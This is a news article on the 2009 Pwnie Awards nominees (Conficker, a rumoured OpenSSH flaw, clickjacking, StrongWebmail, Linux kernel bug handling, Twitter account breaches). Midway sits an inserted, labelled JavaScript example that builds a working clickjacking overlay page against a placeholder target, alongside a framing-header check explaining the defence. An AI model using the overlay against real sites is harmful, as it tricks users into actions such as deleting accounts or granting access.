The Conficker worm, responsible for infecting millions of machines, is one of three nominees for Most Over-hyped Bug at the annual Pwnie Awards.
The informal award ceremony, which takes place each year at the Black Hat briefings in Las Vegas, recognizes security industry failures and over-hyped bugs as well as achievements in the hacker community. The 2009 nominees, which span 10 categories, were announced Tuesday.
The Microsoft RPC worm, known to many as Conficker/Downadup, was estimated to have infected some 10 million machines at its peak in January. Media attention reached a frenzy in March, when researchers announced that on April 1 the worm would switch to a new domain-generation algorithm, making it far harder for the Conficker Working Group to block its command-and-control rendezvous points. The April 1 update came and went with little fanfare.
Still, researchers are puzzled by the botnet's inactivity. Mikko Hyppönen of F-Secure Corp. is intrigued by the mystery of the motives behind Conficker. He plans to present his research next week at Black Hat.
Also nominated for Most Over-hyped Bug was an unsubstantiated OpenSSH zero-day flaw. OpenSSH provides encrypted remote logins and file transfers and is ubiquitous on ISP and hosting servers. Rumors of the zero-day were reported on July 7 by Marcus Sachs, director of the SANS Internet Storm Center. According to the nomination, there were a number of "rash reactions," including one ISP, midPhase, disabling public SSH ports on all shared accounts.
Clickjacking, a technique that tricks users into clicking on controls in a Web page they cannot see, typically by overlaying a transparent frame of the target page on top of a decoy, also received a nomination for Most Over-hyped Bug. Used against the Flash Player settings dialog, the technique could grant a site access to the computer's webcam and microphone. Security researchers Jeremiah Grossman and Robert 'RSnake' Hansen delayed their clickjacking presentation at the OWASP AppSec 2008 conference at the request of Adobe Systems Inc. The two researchers documented the attack vector and also found a way to execute the same kind of attack in Flash files.
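To make the mechanism concrete, here is an added example (not code from the article or from the researchers it names) showing both sides of the technique: a minimal attacker page that overlays an invisible iframe of a victim page on a decoy button, and a check that models how a browser decides whether a page may be framed at all, based on the X-Frame-Options and Content-Security-Policy frame-ancestors headers. The target URL, origins and header values are hypothetical.

```javascript
// Added example: clickjacking overlay and a frame-ancestors header check.
// Not from the original article. TARGET_URL and all origins are hypothetical.

const TARGET_URL = "https://target.example/account/delete"; // hypothetical victim page

// Attacker page: the victim page is loaded in a fully transparent iframe and
// positioned so that its dangerous button sits exactly under a visible decoy.
// offsetX/offsetY are the coordinates of that button inside the victim page.
function buildClickjackPage(targetUrl, decoyLabel, offsetX, offsetY) {
  const decoyLeft = 100, decoyTop = 100;
  return `<!doctype html>
<html><body>
<button style="position:absolute;left:${decoyLeft}px;top:${decoyTop}px;z-index:1">${decoyLabel}</button>
<iframe src="${targetUrl}"
  style="position:absolute;left:${decoyLeft - offsetX}px;top:${decoyTop - offsetY}px;width:800px;height:600px;opacity:0;z-index:2;border:0">
</iframe>
</body></html>`;
}

// Model of the browser's decision: may a document served with `headers` from
// targetOrigin be rendered inside a frame hosted at frameOrigin?
// - CSP frame-ancestors, when present, takes precedence over X-Frame-Options.
// - X-Frame-Options DENY blocks all framing; SAMEORIGIN allows only the same origin.
// - With neither header, any origin may frame the page (the clickjackable state).
// Simplification: frame-ancestors host sources are matched as exact origins.
function framingAllowed(headers, targetOrigin, frameOrigin) {
  const lower = {};
  for (const [k, v] of Object.entries(headers)) lower[k.toLowerCase()] = String(v);

  const csp = lower["content-security-policy"];
  if (csp) {
    const directive = csp.split(";").map(s => s.trim())
      .find(s => s.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1)
        .map(s => s.replace(/^'|'$/g, "").toLowerCase());
      if (sources.includes("none")) return false;
      if (sources.includes("*")) return true;
      if (sources.includes("self") && frameOrigin === targetOrigin) return true;
      return sources.includes(frameOrigin.toLowerCase());
    }
  }

  const xfo = (lower["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return frameOrigin === targetOrigin;
  return true;
}

// Headers a page with sensitive actions should send. Both are set because
// older browsers understand only X-Frame-Options.
const HARDENED_HEADERS = {
  "Content-Security-Policy": "frame-ancestors 'none'",
  "X-Frame-Options": "DENY",
};

// Stand-alone demonstration.
const page = buildClickjackPage(TARGET_URL, "Claim your prize", 340, 220);
console.log(page);
console.log("no headers, framed by attacker:",
  framingAllowed({}, "https://target.example", "https://attacker.example"));        // true
console.log("hardened headers, framed by attacker:",
  framingAllowed(HARDENED_HEADERS, "https://target.example", "https://attacker.example")); // false
```

The header check is the part worth keeping: JavaScript "frame-busting" scripts in the victim page were the common defense in 2009 and can be defeated by the framing page, so the reliable fix is a server-side response header that the browser enforces before any script runs.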
Nominees for Most Epic FAIL included StrongWebmail CEO Darren Berkovitz, who challenged hackers to break into his StrongWebmail email account. Security researchers Aviv Raff, Lance James and Mike Bailey took Berkovitz's challenge seriously, exploiting a cross-site scripting flaw in the service to gain access to his account.
Also nominated was "Linux default kernel security," and the Linux kernel development team for its handling of kernel bugs. According to a team of researchers at MIT, the development team does not consistently identify disclosed kernel bugs as security issues, so fixes are not shipped as security updates in a timely manner. The MIT team examined the Linux kernel from January 2006 to December 2008 and found that of 218 kernel flaws, 25.7% had an "impact delay," the lag the researchers measured between a bug's disclosure and its recognition as a security flaw, of more than two weeks, and 14% had an impact delay of more than eight weeks.
"We have shown that, following the disclosure of many core OS bugs, weeks or months lapse before they are identified as security bugs," according to the report. "Based on historical lessons and our own exploit investigation, we conclude that disclosed bugs present a significant security risk until they are fixed with an update, regardless of their perceived security impact."
The final nomination for Most Epic FAIL was Twitter hacking and the security of data in the "cloud." Twitter has been the subject of a number of security incidents, including the hijacking of several high-profile accounts, and it has frequently been targeted by attackers to spread worms and phish users. The latest incident involved Jason Goldman, director of product management at Twitter, whose email was hacked as a result of poor password practices. Access to his account let the attackers into other Twitter staff's personal accounts, including that of co-founder Evan Williams. The incident became embarrassingly high profile when the tech blog TechCrunch published some of the details, including information on company strategy meetings and email exchanges.
In 2008, Dan Kaminsky accepted the award for Most Over-hyped Bug for his discovery of the DNS cache poisoning flaw. Debian, the Linux OS, received the Most Epic FAIL award for shipping, for nearly two years, an OpenSSL package whose random number generator had been crippled by a Debian-specific patch, leaving the keys it generated predictable.